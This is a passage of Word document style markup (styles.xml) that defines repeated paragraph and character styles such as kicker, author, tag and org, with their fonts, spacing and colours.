    <w:name w:val="org5"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="96" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="A6A499"/>
      <w:spacing w:val="60"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d3">
    <w:name w:val="d3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="t">
    <w:name w:val="t"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tw">
    <w:name w:val="tw"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d4">
    <w:name w:val="d4"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker11">
    <w:name w:val="kicker11"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="120"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb6">
    <w:name w:val="part-blurb6"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="D7DDE3"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker12">
    <w:name w:val="kicker12"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:spacing w:val="60"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w6">
    <w:name w:val="w6"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag6">
    <w:name w:val="tag6"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="100"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author6">
    <w:name w:val="author6"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:color w:val="D8D6CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name6">
    <w:name w:val="name6"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org6">
    <w:name w:val="org6"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="96" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="A6A499"/>
      <w:spacing w:val="60"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="g">
    <w:name w:val="g"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="r">
    <w:name w:val="r"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d5">
    <w:name w:val="d5"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d6">
    <w:name w:val="d6"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker13">
    <w:name w:val="kicker13"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="120"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb7">
    <w:name w:val="part-blurb7"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="D7DDE3"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker14">
    <w:name w:val="kicker14"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:spacing w:val="60"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w7">
    <w:name w:val="w7"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag7">
    <w:name w:val="tag7"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="100"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author7">
    <w:name w:val="author7"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:color w:val="D8D6CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name7">
    <w:name w:val="name7"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org7">
    <w:name w:val="org7"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="96" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="A6A499"/>
      <w:spacing w:val="60"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d7">
    <w:name w:val="d7"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d8">
    <w:name w:val="d8"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker15">
    <w:name w:val="kicker15"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="120"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb8">
    <w:name w:val="part-blurb8"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="D7DDE3"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker16">
    <w:name w:val="kicker16"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:spacing w:val="60"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w8">
    <w:name w:val="w8"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag8">
    <w:name w:val="tag8"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="100"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author8">
    <w:name w:val="author8"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:color w:val="D8D6CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name8">
    <w:name w:val="name8"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org8">
    <w:name w:val="org8"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="96" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="A6A499"/>
      <w:spacing w:val="60"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d9">
    <w:name w:val="d9"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d10">
    <w:name w:val="d10"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker17">
    <w:name w:val="kicker17"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="120"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb9">
    <w:name w:val="part-blurb9"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="D7DDE3"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker18">
    <w:name w:val="kicker18"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:spacing w:val="60"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w9">
    <w:name w:val="w9"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag9">
    <w:name w:val="tag9"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="100"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author9">
    <w:name w:val="author9"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:color w:val="D8D6CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name9">
    <w:name w:val="name9"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org9">
    <w:name w:val="org9"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="96" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="A6A499"/>
      <w:spacing w:val="60"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="w10">
    <w:name w:val="w10"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d11">
    <w:name w:val="d11"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d12">
    <w:name w:val="d12"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker19">
    <w:name w:val="kicker19"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="120"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb10">
    <w:name w:val="part-blurb10"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="D7DDE3"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker20">
    <w:name w:val="kicker20"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:spacing w:val="60"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w11">
    <w:name w:val="w11"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag10">
    <w:name w:val="tag10"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="100"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author10">
    <w:name w:val="author10"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:color w:val="D8D6CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name10">
    <w:name w:val="name10"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org10">
    <w:name w:val="org10"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="96" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="A6A499"/>
      <w:spacing w:val="60"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d13">
    <w:name w:val="d13"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d14">
    <w:name w:val="d14"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker21">
    <w:name w:val="kicker21"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="120"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb11">
    <w:name w:val="part-blurb11"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="D7DDE3"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker22">
    <w:name w:val="kicker22"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:spacing w:val="60"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w12">
    <w:name w:val="w12"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag11">
    <w:name w:val="tag11"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="100"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author11">
    <w:name w:val="author11"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:color w:val="D8D6CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name11">
    <w:name w:val="name11"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org11">
    <w:name w:val="org11"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="96" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="A6A499"/>
      <w:spacing w:val="60"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d15">
    <w:name w:val="d15"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d16">
    <w:name w:val="d16"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
